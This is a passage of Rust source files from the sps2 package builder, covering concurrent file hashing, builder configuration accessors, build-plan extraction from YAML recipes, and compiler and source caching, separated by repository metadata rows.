hash: Hash::from_data(b""), // Empty hash for directories
size: 0,
is_directory: true,
is_symlink: false,
#[cfg(unix)]
mode: {
use std::os::unix::fs::PermissionsExt;
Some(metadata.permissions().mode())
},
})
} else if metadata.is_symlink() {
// For symlinks, hash the target path
let target = tokio::fs::read_link(path).await?;
let target_string = target.to_string_lossy().to_string();
let target_bytes = target_string.as_bytes();
Ok(FileHashResult {
relative_path,
hash: Hash::from_data(target_bytes),
size: target_bytes.len() as u64,
is_directory: false,
is_symlink: true,
#[cfg(unix)]
mode: {
use std::os::unix::fs::PermissionsExt;
Some(metadata.permissions().mode())
},
})
} else {
// Regular file
let hash = Hash::hash_file(path).await?;
Ok(FileHashResult {
relative_path,
hash,
size: metadata.len(),
is_directory: false,
is_symlink: false,
#[cfg(unix)]
mode: {
use std::os::unix::fs::PermissionsExt;
Some(metadata.permissions().mode())
},
})
}
}
/// Hash all files in a directory recursively
///
/// # Errors
/// Returns an error if directory traversal fails or file operations fail
pub async fn hash_directory(&self, dir_path: &Path) -> Result<Vec<FileHashResult>, Error> {
let (tx, mut rx) = mpsc::unbounded_channel();
let base_path = dir_path.to_path_buf();
// Spawn task to collect files
let collector_handle = tokio::spawn({
let base_path = base_path.clone();
let tx = tx.clone();
let include_dirs = self.config.include_directories;
async move { collect_files_for_hashing(&base_path, &base_path, tx, include_dirs).await }
});
// Drop the original sender so the channel closes when collection is done
drop(tx);
// Process files with limited concurrency
let mut results = Vec::new();
let mut tasks = JoinSet::new();
let semaphore =
std::sync::Arc::new(tokio::sync::Semaphore::new(self.config.max_concurrency));
while let Some(file_path) = rx.recv().await {
let permit =
semaphore
.clone()
.acquire_owned()
.await
.map_err(|e| StorageError::IoError {
message: format!("semaphore acquire error: {e}"),
})?;
let base_path = base_path.clone();
let hasher = self.clone();
tasks.spawn(async move {
let _permit = permit; // Hold permit until task completes
hasher.hash_file_with_metadata(&file_path, &base_path).await
});
}
// Wait for collector to finish
collector_handle.await.map_err(|e| StorageError::IoError {
message: format!("task join error: {e}"),
})??;
// Collect all results
while let Some(result) = tasks.join_next().await {
match result {
Ok(Ok(hash_result)) => results.push(hash_result),
Ok(Err(e)) => return Err(e),
Err(e) => {
return Err(StorageError::IoError {
message: format!("task join error: {e}"),
}
.into())
}
}
}
// Sort results by path for deterministic output
results.sort_by(|a, b| a.relative_path.cmp(&b.relative_path));
Ok(results)
}
/// Hash files from an iterator of paths
///
/// # Errors
/// Returns an error if any file operation fails
pub async fn hash_files<I, P>(
&self,
base_path: &Path,
paths: I,
) -> Result<Vec<FileHashResult>, Error>
where
I: IntoIterator<Item = P>,
P: AsRef<Path>,
{
let mut tasks = JoinSet::new();
let semaphore =
std::sync::Arc::new(tokio::sync::Semaphore::new(self.config.max_concurrency));
let base_path = base_path.to_path_buf();
for path in paths {
let file_path = base_path.join(path.as_ref());
let permit =
semaphore
.clone()
.acquire_owned()
.await
.map_err(|e| StorageError::IoError {
message: format!("semaphore acquire error: {e}"),
})?;
let base_path = base_path.clone();
let hasher = self.clone();
tasks.spawn(async move {
let _permit = permit;
hasher.hash_file_with_metadata(&file_path, &base_path).await
});
}
let mut results = Vec::new();
while let Some(result) = tasks.join_next().await {
match result {
Ok(Ok(hash_result)) => results.push(hash_result),
Ok(Err(e)) => return Err(e),
Err(e) => {
return Err(StorageError::IoError {
message: format!("task join error: {e}"),
}
.into())
}
}
}
results.sort_by(|a, b| a.relative_path.cmp(&b.relative_path));
Ok(results)
}
}
impl Clone for FileHasher {
fn clone(&self) -> Self {
Self {
config: self.config.clone(),
}
}
}
/// Helper function to collect files for hashing
async fn collect_files_for_hashing(
base_path: &Path,
current_path: &Path,
tx: mpsc::UnboundedSender<PathBuf>,
include_directories: bool,
) -> Result<(), Error> {
let mut entries = tokio::fs::read_dir(current_path).await?;
while let Some(entry) = entries.next_entry().await? {
let path = entry.path();
let metadata = entry.metadata().await?;
if metadata.is_dir() {
if include_directories {
let _ = tx.send(path.clone());
}
// Recurse into directory
Box::pin(collect_files_for_hashing(
base_path,
&path,
tx.clone(),
include_directories,
))
.await?;
} else {
// Send file or symlink for hashing
let _ = tx.send(path);
}
}
Ok(())
}
/// Calculate the storage path for a file based on its hash
///
/// Returns the path components: (prefix, `full_hash`)
/// For example: hash "abc123..." -> ("ab/c1", "abc123...")
#[must_use]
pub fn calculate_file_storage_path(hash: &Hash) -> (String, String) {
let hex = hash.to_hex();
let prefix1 = hex.chars().take(2).collect::<String>();
let prefix2 = hex.chars().skip(2).take(2).collect::<String>();
(format!("{prefix1}/{prefix2}"), hex)
}
#[cfg(test)]
mod tests {
use super::*;
use tempfile::TempDir;
use tokio::fs;
#[tokio::test]
async fn test_hash_single_file() {
let temp_dir = TempDir::new().unwrap();
let file_path = temp_dir.path().join("test.txt");
fs::write(&file_path, b"Hello, world!").await.unwrap();
let hasher = FileHasher::new(FileHasherConfig::default());
let result = hasher
.hash_file_with_metadata(&file_path, temp_dir.path())
.await
.unwrap();
assert_eq!(result.relative_path, "test.txt");
assert_eq!(result.size, 13);
assert!(!result.is_directory);
assert!(!result.is_symlink);
}
#[tokio::test]
async fn test_hash_directory() {
let temp_dir = TempDir::new().unwrap();
// Create test structure
fs::create_dir(temp_dir.path().join("subdir"))
.await
.unwrap();
fs::write(temp_dir.path().join("file1.txt"), b"content1")
.await
.unwrap();
fs::write(temp_dir.path().join("subdir/file2.txt"), b"content2")
.await
.unwrap();
let hasher = FileHasher::new(FileHasherConfig::default());
let results = hasher.hash_directory(temp_dir.path()).await.unwrap();
// Should have 3 entries: root dir, subdir, and 2 files
assert!(results.len() >= 2); // At least the two files
// Check that files are sorted by path
let file_results: Vec<_> = results.iter().filter(|r| !r.is_directory).collect();
assert!(file_results.iter().any(|r| r.relative_path == "file1.txt"));
assert!(file_results
.iter()
.any(|r| r.relative_path == "subdir/file2.txt"));
}
#[test]
fn test_storage_path_calculation() {
let hash = Hash::from_data(b"test data");
let (prefix, full_hash) = calculate_file_storage_path(&hash);
assert_eq!(prefix.len(), 5);
assert_eq!(full_hash, hash.to_hex());
let expected_prefix = format!("{}/{}", &full_hash[0..2], &full_hash[2..4]);
assert_eq!(prefix, expected_prefix);
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/config.rs | crates/builder/src/config.rs | #![deny(clippy::pedantic, unsafe_code)]
//! Builder configuration integration and utilities
//!
//! This module provides integration between the builder crate and the unified
//! configuration system in `sps2_config`. All configuration types are now
//! centralized in the config crate.
use sps2_config::builder::{
BuildSettings, BuilderConfig, CacheSettings, EnvironmentSettings, PackagingSettings,
PerformanceSettings, SbomSettings, SecuritySettings, ShellExpansionPolicy, SigningSettings,
ValidationConfig, ValidationMode,
};
use sps2_config::ResourceManager;
use std::sync::Arc;
/// Builder context configuration
///
/// This struct adapts the centralized `BuilderConfig` for use within
/// the builder crate, adding runtime-specific fields like `ResourceManager`.
#[derive(Clone, Debug)]
pub struct BuildConfig {
/// Core builder configuration from config crate
pub config: BuilderConfig,
/// Resource manager for build operations
pub resources: Arc<ResourceManager>,
/// sps2 system configuration (for command validation)
pub sps2_config: Option<sps2_config::Config>,
}
impl BuildConfig {
/// Create a new `BuildConfig` from a `BuilderConfig`
#[must_use]
pub fn new(config: BuilderConfig) -> Self {
Self {
config,
resources: Arc::new(ResourceManager::default()),
sps2_config: None,
}
}
/// Create a new `BuildConfig` with custom `ResourceManager`
#[must_use]
pub fn with_resources(config: BuilderConfig, resources: Arc<ResourceManager>) -> Self {
Self {
config,
resources,
sps2_config: None,
}
}
/// Create a new `BuildConfig` with `sps2_config`
#[must_use]
pub fn with_sps2_config(mut self, sps2_config: sps2_config::Config) -> Self {
self.sps2_config = Some(sps2_config);
self
}
/// Get build settings
#[must_use]
pub fn build_settings(&self) -> &BuildSettings {
&self.config.build
}
/// Get packaging settings
#[must_use]
pub fn packaging_settings(&self) -> &PackagingSettings {
&self.config.packaging
}
/// Get environment settings
#[must_use]
pub fn environment_settings(&self) -> &EnvironmentSettings {
&self.config.environment
}
/// Get performance settings
#[must_use]
pub fn performance_settings(&self) -> &PerformanceSettings {
&self.config.performance
}
/// Get security settings
#[must_use]
pub fn security_settings(&self) -> &SecuritySettings {
&self.config.security
}
/// Get SBOM configuration
#[must_use]
pub fn sbom_config(&self) -> &SbomSettings {
&self.config.packaging.sbom
}
/// Get signing configuration
#[must_use]
pub fn signing_config(&self) -> &SigningSettings {
&self.config.packaging.signing
}
/// Get cache configuration
#[must_use]
pub fn cache_config(&self) -> &CacheSettings {
&self.config.performance.cache
}
/// Get validation configuration
#[must_use]
pub fn validation_config(&self) -> &ValidationConfig {
&self.config.security.validation
}
/// Get default network access policy (can be overridden by recipe)
#[must_use]
pub fn default_allow_network(&self) -> bool {
self.config.build.default_allow_network
}
/// Get default isolation level (can be overridden by recipe)
#[must_use]
pub fn default_isolation_level(&self) -> &str {
&self.config.build.default_isolation_level
}
/// Get maximum build time in seconds
#[must_use]
pub fn max_build_time(&self) -> Option<u64> {
Some(self.config.build.timeout_seconds)
}
/// Get number of parallel build jobs
#[must_use]
pub fn build_jobs(&self) -> Option<usize> {
if self.config.build.build_jobs == 0 {
None // Auto-detect
} else {
Some(self.config.build.build_jobs)
}
}
/// Get build root directory
#[must_use]
pub fn build_root(&self) -> &std::path::Path {
&self.config.build.build_root
}
/// Check if strict validation is enabled
#[must_use]
pub fn is_strict_validation(&self) -> bool {
matches!(self.config.security.validation.mode, ValidationMode::Strict)
}
/// Check if shell expansion is allowed
#[must_use]
pub fn allow_shell_expansion(&self) -> bool {
matches!(
self.config.security.validation.shell_expansion,
ShellExpansionPolicy::Enabled
)
}
/// Check if a command is allowed
#[must_use]
pub fn is_command_allowed(&self, command: &str) -> bool {
self.config.is_command_allowed(command)
}
/// Check if a shell pattern is allowed
#[must_use]
pub fn is_shell_pattern_allowed(&self, pattern: &str) -> bool {
self.config.is_shell_pattern_allowed(pattern)
}
/// Get all allowed commands
#[must_use]
pub fn get_allowed_commands(&self) -> Vec<String> {
self.config.get_allowed_commands()
}
/// Validate the configuration
///
/// # Errors
///
/// Returns an error if any configuration values are invalid
pub fn validate(&self) -> Result<(), sps2_errors::Error> {
self.config.validate()
}
/// Get access to `sps2_config` (for compatibility)
#[must_use]
pub fn sps2_config(&self) -> Option<&sps2_config::Config> {
self.sps2_config.as_ref()
}
// Builder pattern methods for backward compatibility
/// Create config with network access enabled (deprecated - network comes from recipe)
#[must_use]
pub fn with_network() -> Self {
// Network access should come from recipe, not config
Self::default()
}
/// Set SBOM configuration
#[must_use]
pub fn with_sbom_config(mut self, sbom_config: SbomSettings) -> Self {
self.config.packaging.sbom = sbom_config;
self
}
/// Set signing configuration
#[must_use]
pub fn with_signing_config(mut self, signing_config: SigningSettings) -> Self {
self.config.packaging.signing = signing_config;
self
}
/// Set build timeout
#[must_use]
pub fn with_timeout(mut self, seconds: u64) -> Self {
self.config.build.timeout_seconds = seconds;
self
}
/// Set parallel build jobs
#[must_use]
pub fn with_jobs(mut self, jobs: usize) -> Self {
self.config.build.build_jobs = jobs;
self
}
/// Set build root directory
#[must_use]
pub fn with_build_root(mut self, path: std::path::PathBuf) -> Self {
self.config.build.build_root = path;
self
}
/// Set isolation level (deprecated - isolation comes from recipe)
#[must_use]
pub fn with_isolation_level(self, _level: &str) -> Self {
// Isolation level should come from recipe, not config
self
}
}
impl Default for BuildConfig {
fn default() -> Self {
Self::new(BuilderConfig::default())
}
}
impl From<BuilderConfig> for BuildConfig {
fn from(config: BuilderConfig) -> Self {
Self::new(config)
}
}
// Re-export commonly used types for convenience
pub use sps2_config::builder::{
BuildSystemSettings, CommandsConfig, ShellExpansionPolicy as ConfigShellExpansionPolicy,
ValidationMode as ConfigValidationMode,
};
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_build_config_creation() {
let builder_config = BuilderConfig::default();
let build_config = BuildConfig::new(builder_config);
assert_eq!(build_config.max_build_time(), Some(3600));
assert!(build_config.is_strict_validation());
assert!(!build_config.allow_shell_expansion());
}
#[test]
fn test_build_config_validation() {
let build_config = BuildConfig::default();
assert!(build_config.validate().is_ok());
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/lib.rs | crates/builder/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
//! Package building for sps2
//!
//! This crate handles building packages from YAML recipes with
//! isolated environments, dependency management, and packaging.
pub mod artifact_qa;
mod build_plan;
mod build_systems;
mod cache;
pub mod config;
mod core;
mod environment;
mod packaging;
mod recipe;
mod security;
mod stages;
mod utils;
mod validation;
mod yaml;
pub use build_systems::{
detect_build_system, AutotoolsBuildSystem, BuildSystem, BuildSystemConfig, BuildSystemContext,
BuildSystemRegistry, CMakeBuildSystem, CargoBuildSystem, GoBuildSystem, MesonBuildSystem,
NodeJsBuildSystem, PythonBuildSystem, TestFailure, TestResults,
};
pub use cache::{
BuildCache, CacheStatistics, CompilerCache, CompilerCacheType, IncrementalBuildTracker,
SourceCache,
};
pub use config::BuildConfig;
pub use core::api::BuilderApi;
pub use core::builder::Builder;
pub use environment::{BuildCommandResult, BuildEnvironment, BuildResult};
pub use utils::format::{detect_compression_format, CompressionFormatInfo};
// Re-export packaging types
pub use packaging::archive::{create_deterministic_tar_archive, get_deterministic_timestamp};
pub use packaging::compression::compress_with_zstd;
// SBOM-related re-exports removed
// SBOM types removed from re-exports
pub use packaging::manifest::create_manifest;
pub use packaging::signing::PackageSigner;
pub use packaging::{create_and_sign_package, create_package};
// Re-export config types for backward compatibility
// Re-export YAML types (from yaml module)
pub use yaml::{BuildStep, RecipeMetadata};
// Re-export recipe types (from recipe module)
pub use recipe::model::{
Build, BuildSystem as YamlBuildSystem, ChecksumAlgorithm, ParsedStep, PostCommand, PostOption,
RpathPatchOption, SourceMethod, YamlRecipe,
};
pub use recipe::parser::parse_yaml_recipe;
pub use core::context::BuildContext;
// Re-export build plan and security types for pack command
pub use build_plan::BuildPlan;
pub use security::SecurityContext;
pub use stages::build::BuildCommand;
pub use stages::executors::execute_post_step_with_security;
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/build_plan.rs | crates/builder/src/build_plan.rs | //! Build plan representation for staged execution
use crate::environment::IsolationLevel;
use crate::recipe::model::YamlRecipe;
use crate::stages::{BuildCommand, PostStep, SourceStep};
use crate::validation;
use crate::yaml::RecipeMetadata;
use sps2_errors::Error;
use sps2_types::RpathStyle;
use std::collections::HashMap;
use std::path::Path;
/// Collection of steps by stage type
struct StageSteps {
source: Vec<SourceStep>,
build: Vec<BuildCommand>,
post: Vec<PostStep>,
}
/// Complete build plan extracted from recipe
#[derive(Debug, Clone)]
pub struct BuildPlan {
/// Package metadata
pub metadata: RecipeMetadata,
/// Environment configuration (extracted from recipe, applied before build)
pub environment: EnvironmentConfig,
/// Source operations (fetch, git, local, patches)
pub source_steps: Vec<SourceStep>,
/// Build operations (configure, make, etc.)
pub build_steps: Vec<BuildCommand>,
/// Post-processing operations
pub post_steps: Vec<PostStep>,
/// QA pipeline override
pub qa_pipeline: sps2_types::QaPipelineOverride,
/// Whether to automatically install after build
pub auto_install: bool,
}
/// Environment configuration to apply before build
#[derive(Debug, Clone)]
pub struct EnvironmentConfig {
/// Isolation level
pub isolation: IsolationLevel,
/// Whether to apply compiler defaults
pub defaults: bool,
/// Whether to allow network access
pub network: bool,
/// Environment variables to set
pub variables: HashMap<String, String>,
}
impl BuildPlan {
/// Create a build plan from a YAML recipe
///
/// # Errors
///
/// Returns an error if validation fails for any build step
pub fn from_yaml(
recipe: &YamlRecipe,
recipe_path: &Path,
sps2_config: Option<&sps2_config::Config>,
) -> Result<Self, Error> {
// Extract environment config
let environment = EnvironmentConfig {
isolation: recipe.environment.isolation,
defaults: recipe.environment.defaults,
network: recipe.environment.network,
variables: recipe.environment.variables.clone(),
};
// Convert metadata
let metadata = RecipeMetadata {
name: recipe.metadata.name.clone(),
version: recipe.metadata.version.clone(),
description: recipe.metadata.description.clone().into(),
homepage: recipe.metadata.homepage.clone(),
license: Some(recipe.metadata.license.clone()),
runtime_deps: recipe.metadata.dependencies.runtime.clone(),
build_deps: recipe.metadata.dependencies.build.clone(),
};
// Extract steps by stage
let stage_steps = Self::extract_steps_by_stage(recipe, recipe_path, sps2_config)?;
Ok(Self {
metadata,
environment,
source_steps: stage_steps.source,
build_steps: stage_steps.build,
post_steps: stage_steps.post,
qa_pipeline: recipe.post.qa_pipeline,
auto_install: recipe.install.auto,
})
}
/// Extract build steps organized by stage
fn extract_steps_by_stage(
recipe: &YamlRecipe,
recipe_path: &Path,
sps2_config: Option<&sps2_config::Config>,
) -> Result<StageSteps, Error> {
let source_steps = Self::extract_source_steps(recipe, recipe_path)?;
let build_steps = Self::extract_build_steps(recipe, sps2_config)?;
let post_steps = Self::extract_post_steps(recipe, &build_steps, sps2_config)?;
Ok(StageSteps {
source: source_steps,
build: build_steps,
post: post_steps,
})
}
/// Extract source steps from recipe
fn extract_source_steps(
recipe: &YamlRecipe,
recipe_path: &Path,
) -> Result<Vec<SourceStep>, Error> {
let mut source_steps = Vec::new();
// Source acquisition
if let Some(method) = &recipe.source.method {
Self::add_source_method_steps(&mut source_steps, method, None);
} else {
// Handle multi-source case
for named_source in &recipe.source.sources {
Self::add_source_method_steps(
&mut source_steps,
&named_source.method,
named_source.extract_to.clone(),
);
}
}
// Apply patches
for patch in &recipe.source.patches {
source_steps.push(SourceStep::ApplyPatch {
path: patch.clone(),
});
}
// Validate all source steps
let recipe_dir = recipe_path.parent().unwrap_or(Path::new("."));
for step in &source_steps {
validation::validate_source_step(step, recipe_dir)?;
}
Ok(source_steps)
}
/// Add source method steps to the steps vector
fn add_source_method_steps(
source_steps: &mut Vec<SourceStep>,
method: &crate::recipe::model::SourceMethod,
extract_to: Option<String>,
) {
use crate::recipe::model::{ChecksumAlgorithm, SourceMethod};
match method {
SourceMethod::Git { git } => {
source_steps.push(SourceStep::Git {
url: git.url.clone(),
ref_: git.git_ref.clone(),
});
}
SourceMethod::Fetch { fetch } => {
let extract_to = extract_to.or_else(|| fetch.extract_to.clone());
match &fetch.checksum {
Some(checksum) => match &checksum.algorithm {
ChecksumAlgorithm::Blake3 { blake3 } => {
source_steps.push(SourceStep::FetchBlake3 {
url: fetch.url.clone(),
blake3: blake3.clone(),
extract_to,
});
}
ChecksumAlgorithm::Sha256 { sha256 } => {
source_steps.push(SourceStep::FetchSha256 {
url: fetch.url.clone(),
sha256: sha256.clone(),
extract_to,
});
}
ChecksumAlgorithm::Md5 { md5 } => {
source_steps.push(SourceStep::FetchMd5 {
url: fetch.url.clone(),
md5: md5.clone(),
extract_to,
});
}
},
None => {
source_steps.push(SourceStep::Fetch {
url: fetch.url.clone(),
extract_to,
});
}
}
}
SourceMethod::Local { local } => {
source_steps.push(SourceStep::Copy {
src_path: Some(local.path.clone()),
});
}
}
}
/// Extract build steps from recipe
fn extract_build_steps(
recipe: &YamlRecipe,
sps2_config: Option<&sps2_config::Config>,
) -> Result<Vec<BuildCommand>, Error> {
use crate::recipe::model::Build;
let mut build_steps = Vec::new();
match &recipe.build {
Build::System { system, args } => {
let step = match system {
crate::recipe::model::BuildSystem::Autotools => {
BuildCommand::Autotools { args: args.clone() }
}
crate::recipe::model::BuildSystem::Cmake => {
BuildCommand::Cmake { args: args.clone() }
}
crate::recipe::model::BuildSystem::Meson => {
BuildCommand::Meson { args: args.clone() }
}
crate::recipe::model::BuildSystem::Cargo => {
BuildCommand::Cargo { args: args.clone() }
}
crate::recipe::model::BuildSystem::Go => {
BuildCommand::Go { args: args.clone() }
}
crate::recipe::model::BuildSystem::Python => {
BuildCommand::Python { args: args.clone() }
}
crate::recipe::model::BuildSystem::Nodejs => {
BuildCommand::NodeJs { args: args.clone() }
}
crate::recipe::model::BuildSystem::Make => {
BuildCommand::Make { args: args.clone() }
}
};
build_steps.push(step);
}
Build::Steps { steps } => {
for step in steps {
// Validate and convert each step
let build_step = validation::validate_build_step(step, sps2_config)?;
build_steps.push(build_step);
}
}
}
Ok(build_steps)
}
/// Extract post-processing steps from recipe
fn extract_post_steps(
recipe: &YamlRecipe,
build_steps: &[BuildCommand],
sps2_config: Option<&sps2_config::Config>,
) -> Result<Vec<PostStep>, Error> {
use crate::recipe::model::{PostOption, RpathPatchOption};
let mut post_steps = Vec::new();
// Fix permissions
match &recipe.post.fix_permissions {
PostOption::Enabled(true) => {
post_steps.push(PostStep::FixPermissions {
paths: vec![], // Will use default paths
});
}
PostOption::Paths(paths) => {
post_steps.push(PostStep::FixPermissions {
paths: paths.clone(),
});
}
PostOption::Enabled(false) => {}
}
// Patch rpaths
match &recipe.post.patch_rpaths {
RpathPatchOption::Default => {
// Default behavior depends on the build system
let is_c_build_system = build_steps.iter().any(|step| {
matches!(
step,
BuildCommand::Autotools { .. }
| BuildCommand::Cmake { .. }
| BuildCommand::Make { .. }
| BuildCommand::Configure { .. }
)
});
if is_c_build_system {
// For C/C++ projects, default to modern rpath patching
post_steps.push(PostStep::PatchRpaths {
style: RpathStyle::Modern,
paths: vec![], // Will use default paths
});
} else {
// For Rust, Go, etc., skip rpath patching by default
}
}
RpathPatchOption::Absolute => {
// Absolute: Convert @rpath to absolute paths
post_steps.push(PostStep::PatchRpaths {
style: RpathStyle::Absolute,
paths: vec![], // Will use default paths
});
}
RpathPatchOption::Skip => {
// Skip: No rpath patching
}
}
// Custom post-processing commands
for command in &recipe.post.commands {
// Validate and convert each command
let post_step = validation::validate_post_command(command, sps2_config)?;
post_steps.push(post_step);
}
Ok(post_steps)
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/builder/src/cache.rs | crates/builder/src/cache.rs | // Crate-level pedantic settings apply
//! Caching and incremental builds system
//!
//! This module provides build caching, artifact storage, and incremental build tracking
//! to speed up repeated builds and avoid unnecessary recompilation.
use sps2_errors::Error;
use sps2_events::{AppEvent, BuildDiagnostic, BuildEvent, EventEmitter, EventSender};
use std::collections::HashMap;
use std::path::{Path, PathBuf};
use std::sync::Arc;
use std::time::SystemTime;
use tokio::fs;
use tokio::sync::RwLock;
/// Build cache for compiler caching and source downloads
#[derive(Debug, Clone)]
pub struct BuildCache {
cache_root: PathBuf,
source_cache: Arc<SourceCache>,
compiler_cache: Arc<CompilerCache>,
stats: Arc<RwLock<CacheStatistics>>,
event_sender: Option<sps2_events::EventSender>,
}
impl EventEmitter for BuildCache {
fn event_sender(&self) -> Option<&EventSender> {
self.event_sender.as_ref()
}
}
impl BuildCache {
/// Create a new build cache
///
/// # Errors
///
/// Returns an error if:
/// - Failed to create the cache directory
/// - Failed to initialize the source or compiler caches
pub async fn new(
cache_root: PathBuf,
event_sender: Option<EventSender>,
) -> Result<Self, Error> {
fs::create_dir_all(&cache_root).await?;
let source_cache = Arc::new(SourceCache::new(cache_root.join("sources")).await?);
let compiler_cache = Arc::new(CompilerCache::new(cache_root.join("compiler")).await?);
let stats = Arc::new(RwLock::new(CacheStatistics::default()));
Ok(Self {
cache_root,
source_cache,
compiler_cache,
stats,
event_sender,
})
}
/// Get cache statistics
pub async fn get_statistics(&self) -> CacheStatistics {
self.stats.read().await.clone()
}
/// Get the cache root directory
#[must_use]
pub fn cache_root(&self) -> &Path {
&self.cache_root
}
/// Get the compiler cache instance
#[must_use]
pub fn compiler_cache(&self) -> &CompilerCache {
&self.compiler_cache
}
/// Get the source cache instance
#[must_use]
pub fn source_cache(&self) -> &SourceCache {
&self.source_cache
}
/// Clear all caches
///
/// # Errors
///
/// Returns an error if cache cleanup fails.
pub async fn clear_all(&self) -> Result<(), Error> {
self.source_cache.clear().await;
// Reset statistics
let mut stats = self.stats.write().await;
*stats = CacheStatistics::default();
self.emit(AppEvent::Build(BuildEvent::Diagnostic(
BuildDiagnostic::CachePruned {
removed_items: 0,
freed_bytes: 0,
},
)));
Ok(())
}
}
/// Simple source cache for downloads and git repositories
#[derive(Debug)]
pub struct SourceCache {
#[allow(dead_code)] // Stored for potential future cache operations
cache_dir: PathBuf,
downloads: RwLock<HashMap<String, PathBuf>>,
git_repos: RwLock<HashMap<String, PathBuf>>,
}
impl SourceCache {
/// Create new source cache
///
/// # Errors
///
/// Returns an error if the cache directory cannot be created.
pub async fn new(cache_dir: PathBuf) -> Result<Self, Error> {
fs::create_dir_all(&cache_dir).await?;
Ok(Self {
cache_dir,
downloads: RwLock::new(HashMap::new()),
git_repos: RwLock::new(HashMap::new()),
})
}
/// Cache a downloaded file
pub async fn cache_download(&self, url: String, path: PathBuf) {
let mut downloads = self.downloads.write().await;
downloads.insert(url, path);
}
/// Get cached download path
pub async fn get_download(&self, url: &str) -> Option<PathBuf> {
let downloads = self.downloads.read().await;
downloads.get(url).cloned()
}
/// Cache a git repository
pub async fn cache_git_repo(&self, url: String, path: PathBuf) {
let mut repos = self.git_repos.write().await;
repos.insert(url, path);
}
/// Get cached git repository path
pub async fn get_git_repo(&self, url: &str) -> Option<PathBuf> {
let repos = self.git_repos.read().await;
repos.get(url).cloned()
}
/// Clear all cached entries
pub async fn clear(&self) {
let mut downloads = self.downloads.write().await;
let mut repos = self.git_repos.write().await;
downloads.clear();
repos.clear();
}
}
/// Compiler cache integration
#[derive(Debug)]
pub struct CompilerCache {
cache_type: CompilerCacheType,
cache_dir: PathBuf,
max_size: u64,
}
/// Type of compiler cache
#[derive(Debug, Clone, Copy)]
pub enum CompilerCacheType {
/// ccache
CCache,
/// sccache
SCCache,
/// No cache
None,
}
impl CompilerCache {
async fn new(cache_dir: PathBuf) -> Result<Self, Error> {
fs::create_dir_all(&cache_dir).await?;
// Detect available compiler cache
let cache_type = if which::which("sccache").is_ok() {
CompilerCacheType::SCCache
} else if which::which("ccache").is_ok() {
CompilerCacheType::CCache
} else {
CompilerCacheType::None
};
Ok(Self {
cache_type,
cache_dir,
max_size: 5 * 1024 * 1024 * 1024, // 5GB default
})
}
/// Get environment variables for compiler cache
///
/// Returns environment variables that should be set for the compiler cache to work.
/// These variables configure cache directories and size limits.
#[must_use]
pub fn get_env_vars(&self) -> HashMap<String, String> {
let mut vars = HashMap::new();
match self.cache_type {
CompilerCacheType::CCache => {
vars.insert(
"CCACHE_DIR".to_string(),
self.cache_dir.display().to_string(),
);
vars.insert(
"CCACHE_MAXSIZE".to_string(),
format!("{}G", self.max_size / (1024 * 1024 * 1024)),
);
}
CompilerCacheType::SCCache => {
vars.insert(
"SCCACHE_DIR".to_string(),
self.cache_dir.display().to_string(),
);
vars.insert(
"SCCACHE_CACHE_SIZE".to_string(),
format!("{}G", self.max_size / (1024 * 1024 * 1024)),
);
vars.insert("RUSTC_WRAPPER".to_string(), "sccache".to_string());
}
CompilerCacheType::None => {}
}
vars
}
/// Get wrapper command for compiler
///
/// Returns the wrapper command (ccache or sccache) if a compiler cache is enabled.
/// This should be prepended to compiler invocations.
#[must_use]
pub fn get_wrapper(&self) -> Option<&'static str> {
match self.cache_type {
CompilerCacheType::CCache => Some("ccache"),
CompilerCacheType::SCCache => Some("sccache"),
CompilerCacheType::None => None,
}
}
}
/// Incremental build tracking
#[derive(Debug)]
pub struct IncrementalBuildTracker {
/// File modification times
file_mtimes: RwLock<HashMap<PathBuf, SystemTime>>,
/// Dependency graph
dep_graph: RwLock<HashMap<PathBuf, Vec<PathBuf>>>,
/// Changed files
changed_files: RwLock<Vec<PathBuf>>,
}
impl IncrementalBuildTracker {
/// Create new incremental build tracker
///
/// The tracker must be used to monitor file changes and determine if rebuilds are needed.
#[must_use]
pub fn new() -> Self {
Self {
file_mtimes: RwLock::new(HashMap::new()),
dep_graph: RwLock::new(HashMap::new()),
changed_files: RwLock::new(Vec::new()),
}
}
/// Track file modification
///
/// # Errors
///
/// Returns an error if:
/// - Failed to access file metadata
/// - I/O errors occur while reading file information
pub async fn track_file(&self, path: &Path) -> Result<(), Error> {
if let Ok(metadata) = fs::metadata(path).await {
if let Ok(mtime) = metadata.modified() {
let mut mtimes = self.file_mtimes.write().await;
mtimes.insert(path.to_path_buf(), mtime);
}
}
Ok(())
}
/// Check if file has changed
///
/// # Errors
///
/// Returns an error if:
/// - Failed to access file metadata
/// - I/O errors occur while reading file information
pub async fn has_file_changed(&self, path: &Path) -> Result<bool, Error> {
let mtimes = self.file_mtimes.read().await;
if let Some(&stored_mtime) = mtimes.get(path) {
if let Ok(metadata) = fs::metadata(path).await {
if let Ok(current_mtime) = metadata.modified() {
return Ok(current_mtime > stored_mtime);
}
}
}
// If we can't determine, assume it changed
Ok(true)
}
/// Add dependency relationship
pub async fn add_dependency(&self, target: PathBuf, dependency: PathBuf) {
let mut graph = self.dep_graph.write().await;
graph.entry(target).or_default().push(dependency);
}
/// Get files that need rebuilding
pub async fn get_files_to_rebuild(&self) -> Vec<PathBuf> {
self.changed_files.read().await.clone()
}
/// Mark file as changed
pub async fn mark_changed(&self, path: PathBuf) {
let mut changed = self.changed_files.write().await;
if !changed.contains(&path) {
changed.push(path);
}
}
/// Clear changed files after build
pub async fn clear_changed_files(&self) {
